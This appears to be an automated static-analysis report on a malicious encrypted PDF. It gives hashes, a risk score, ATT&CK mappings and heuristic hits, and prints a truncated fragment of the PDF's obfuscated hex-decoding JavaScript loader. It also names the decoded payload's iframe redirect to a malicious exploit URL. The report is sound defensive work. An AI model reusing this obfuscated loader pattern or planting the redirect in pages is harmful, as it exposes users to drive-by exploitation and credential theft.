Malicious PDF — malware analysis report

Static analysis result for SHA-256 afb903014a6bc90f…

MALICIOUS

PDF

1.6 KB First seen: 2026-05-10
MD5: 331f950a3b4e679810a0d8c90d441eba SHA-1: ea076bdd40313f2b40c2d732a0f564accd82562e SHA-256: afb903014a6bc90f35a6e578d45fb1c6eac37713ec1425078b5ac3597c901a3a
60 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.002 Spearphishing Attachment

The PDF is encrypted, but static analysis revealed an embedded script payload. The script, when decoded, constructs an iframe pointing to 'http://reddii.ru/traffic/sployt1/sp1.php?'+Math.round(Math.random()*11845)+'. This indicates the PDF is likely a lure to redirect the user to a malicious site, potentially for further exploitation or credential harvesting.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9994

Heuristics 3

  • Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • String.fromCharCode low PDF_FROMCHARCODE
    String.fromCharCode found — used to construct payload strings dynamically. Common in benign JavaScript libraries for codepoint manipulation, so this alone is informational; weaponised use is also caught by the dedicated fromCharCode-stage and exploit-shape rules.
    Matched line in script
    endobj
    19 0 obj<</R 2/Length 40/Filter/Standard/O(²½ î\)ùIª$ Éo \n ÙãÉÉ Y Ù} Å} -§jÓ)/P -60/U(æOr[ ` 7Ö³"9ðZËÒØM<script>function vbYbdxtdtxd(vtydbdadxax){  return(parseInt(vtydbdadxax,16));}function vxVtydaabba(vayaVVabdYY){  var vVatbayydtY='';for(vxtYxdydYYV=0; vxtYxdydYYV<vayaVVabdYY.length; vxtYxdydYYV+=2){vVatbayydtY+=(String.fromCharCode(vbYbdxtdtxd(vayaVVabdYY.substr(vxtYxdydYYV,2))));}return vVatbayydtY;} document.write(vxVtydaabba('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F …
  • Encrypted PDF (string and stream contents are opaque to static scan) info PDF_ENCRYPTED
    PDF declares /Encrypt — string objects and stream contents are encrypted with the standard security handler (RC4 or AES). On its own this is informational; legitimate encrypted documents include signed contracts, billing statements, and rights-managed material. Static heuristics cannot inspect encrypted payload bytes.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_00000325.bin pdf-embedded-script PDF decompressed stream script payload at offset 0x325 58 bytes
SHA-256: a7c962ec478d5348e3cd62abde37058c6ff2a011fcf4e46b79217e98b417a57a
Preview script
First 1,000 lines of the extracted script
�Or[�` 7ֳ"9�Z���M<script>function vbYbdxtdtxd(vtydbdadxax